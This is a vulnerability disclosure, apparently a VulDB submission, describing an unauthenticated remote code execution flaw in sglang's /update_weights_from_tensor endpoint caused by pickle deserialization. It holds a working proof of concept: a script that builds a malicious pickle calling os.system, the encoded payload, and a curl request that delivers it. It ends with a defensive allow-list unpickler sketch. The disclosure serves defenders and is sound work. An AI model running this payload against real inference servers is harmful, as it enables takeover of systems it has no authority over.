Submit #635919: lmsys sglang >=0.4.6 Deserialization

Title	lmsys sglang >=0.4.6 Deserialization
Description	> Author: simonhuang ([email protected]), pjf

> Affected Products or Components

1. Sglang: Primarily developed by top global AI institutions such as xAI, Berkeley, ByteDance, and Meta, Sglang is currently the most widely used large model inference framework worldwide. Millions of large model training and inference servers from xAI, Berkeley, ByteDance, Meta, Google, Microsoft, Baidu, Alibaba, and Tencent are running Sglang.

Project URL: https://github.com/sgl-project/sglang
Affected Versions: sglang >= v0.4.6
Initial Vulnerability Introduction Date: 2025-04-13

> Brief Vulnerability Description

Sglang contains a Remote Code Execution (RCE) vulnerability classified as Critical. An unauthenticated attacker can exploit this vulnerability to execute arbitrary code on the target system or obtain a reverse shell, thereby achieving full control over the affected system.

> Technical Details of the Vulnerability

1. Technical Details

The vulnerability arises from an insecure deserialization issue in the `/update_weights_from_tensor` endpoint of Sglang. Specifically, it exists in the file `python/sglang/srt/entrypoints/http_server.py`, line 572, in the latest `main` branch of the Sglang project.

This endpoint accepts POST data in the following format:

```json
{
  "serialized_named_tensors": ["base64-encoded pickle serialized string"],
  "flush_cache": true
}
```

The value of `serialized_named_tensors` is subsequently deserialized using Python's `pickle` module. The arbitrary code execution vulnerability occurs during this deserialization process.

2. Detailed Steps to Reproduce the Vulnerability

2.1 Target Environment Setup

In a real-world attack scenario, the attacker would scan for servers running large model inference services. For demonstration, we will either install Sglang manually or use the official Sglang Docker image and run inference on any model (e.g., Llama or Qwen).

Option 1: Using the Official Sglang Docker Image

- Step (1): Pull the Docker image

```bash
docker pull lmsysorg/sglang:latest
```

- Step (2): Download the model

```bash
# Run from /models so the download lands at /models/Qwen1.5-0.5B,
# the path mounted and served in Step (3).
huggingface-cli download --resume-download Qwen/Qwen1.5-0.5B --local-dir Qwen1.5-0.5B --local-dir-use-symlinks False
```

- Step (3): Start the Sglang inference service

```bash
sudo docker run --gpus "0" \
  --name sglang0 \
  --shm-size 32g \
  -p 3456:3456 \
  -v /models:/models \
  --ipc=host \
  lmsysorg/sglang:latest \
  python3 -m sglang.launch_server --model-path /models/Qwen1.5-0.5B \
  --served-model-name Qwen1.5-0.5B \
  --tp-size 1 --mem-fraction-static 0.8 \
  --host x.x.x.x --port 3456 &
```

Option 2: Manual Installation and Inference Setup

- Step (1): Install Sglang

```bash
pip install --upgrade pip
pip install uv
uv pip install "sglang[all]>=0.5.0rc0"
```

- Step (2): Download the model

```bash
# Run from /models so the download lands at /models/Qwen1.5-0.5B,
# the path served in Step (3).
huggingface-cli download --resume-download Qwen/Qwen1.5-0.5B --local-dir Qwen1.5-0.5B --local-dir-use-symlinks False
```

- Step (3): Launch the Sglang inference server

```bash
python3 -m sglang.launch_server --model-path /models/Qwen1.5-0.5B \
  --served-model-name Qwen1.5-0.5B \
  --tp-size 1 --mem-fraction-static 0.8 \
  --host x.x.x.x --port 3456 &
```

After completing either Option 1 or Option 2, the Sglang inference service will be deployed and accessible at `http://<server-ip>:3456`, where `<server-ip>` is the IP address of the server.

2.2 Constructing the Proof of Concept (PoC)

Use the following Python script to encode the malicious payload:

```python
import base64
import pickle
import os

# Define malicious class
class Malicious:
    def __reduce__(self):
        # Arbitrary code can be executed here; using os.system to run echo as a PoC
        return (os.system, ('echo RCE-Exploit-By-Simon@360!',))

# Serialize the malicious object
malicious_data = pickle.dumps([Malicious()])

# Base64 encode the serialized payload
malicious_b64str = base64.b64encode(malicious_data)
print(malicious_b64str.decode())
# Output: gASVPAAAAAAAAABdlIwFcG9zaXiUjAZzeXN0ZW2Uk5SMHmVjaG8gUkNFLUV4cGxvaXQtQnktU2ltb25AMzYwIZSFlFKUYS4=
```

The output string is the exploit payload (in this example: `gASVPAAAAAAAAABdlIwFcG9zaXiUjAZzeXN0ZW2Uk5SMHmVjaG8gUkNFLUV4cGxvaXQtQnktU2ltb25AMzYwIZSFlFKUYS4=`).

2.3 Executing the Attack

Send the following HTTP POST request to the target service using `curl`:

```bash
curl --location --request POST 'http://x.x.x.x:3456/update_weights_from_tensor' \
  --header 'Content-Type: application/json' \
  --data-raw '{
    "serialized_named_tensors": ["gASVPAAAAAAAAABdlIwFcG9zaXiUjAZzeXN0ZW2Uk5SMHmVjaG8gUkNFLUV4cGxvaXQtQnktU2ltb25AMzYwIZSFlFKUYS4="],
    "flush_cache": true
  }'
```

2.4 Verifying Successful Code Execution

On the server side, observe the Sglang service logs. You should see an error or log entry indicating that the `echo` command was successfully executed, with the output:

```
RCE-Exploit-By-Simon@360!
```

3. PoC (Proof of Concept)

The proof of concept has been fully detailed in section 2 above ("Steps to Reproduce the Vulnerability").
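
To illustrate why unpickling attacker-controlled bytes is dangerous and how an allow-list narrows the risk, here is a minimal sketch that follows the "restricting globals" pattern from the Python `pickle` documentation. It is not Sglang's code or its actual fix. The names `RestrictedUnpickler`, `ALLOWED_GLOBALS`, `restricted_loads_b64`, and `HarmlessGadget` are hypothetical, and the gadget calls the harmless built-in `len` in place of `os.system`.

```python
import base64
import io
import pickle


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that resolves only globals named on an explicit allow-list."""

    # Hypothetical allow-list of (module, name) pairs. Left empty here, so only
    # plain containers and scalars (list, tuple, dict, str, float, ...) load.
    ALLOWED_GLOBALS = frozenset()

    def find_class(self, module, name):
        # pickle calls find_class for every global a payload references,
        # before any REDUCE opcode can invoke that global.
        if (module, name) in self.ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is not allowed")


def restricted_loads_b64(payload_b64):
    """Base64-decode a payload and unpickle it with the restricted loader."""
    raw = base64.b64decode(payload_b64)
    return RestrictedUnpickler(io.BytesIO(raw)).load()


class HarmlessGadget:
    """Stand-in for the report's Malicious class; it calls len, not os.system."""

    def __reduce__(self):
        return (len, ("abc",))


# A payload made only of plain data, and one that smuggles in a callable.
plain_b64 = base64.b64encode(pickle.dumps([("weight", [1.0, 2.0])])).decode()
gadget_b64 = base64.b64encode(pickle.dumps([HarmlessGadget()])).decode()

# Plain data loads normally.
print(restricted_loads_b64(plain_b64))

# The gadget payload is refused before its callable can run.
try:
    restricted_loads_b64(gadget_b64)
except pickle.UnpicklingError as exc:
    print("rejected:", exc)
```

With plain `pickle.loads`, the gadget payload would invoke its callable during deserialization, which is the behavior the PoC relies on. An allow-list reduces that exposure but does not make pickle a safe format for untrusted input; real tensor payloads would also need specific globals added to the list, and every allowed global becomes part of the attack surface.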
User	hl4x7eq28 (UID 89020)
Submission	16.08.2025 07:07 (10 months ago)
Moderation	09.09.2025 15:23 (24 days later)
Status	Accepted
VulDB entry	323203 [lmsys sglang 0.4.6 update_weights_from_tensor main serialized_named_tensors privilege escalation]
Points	17
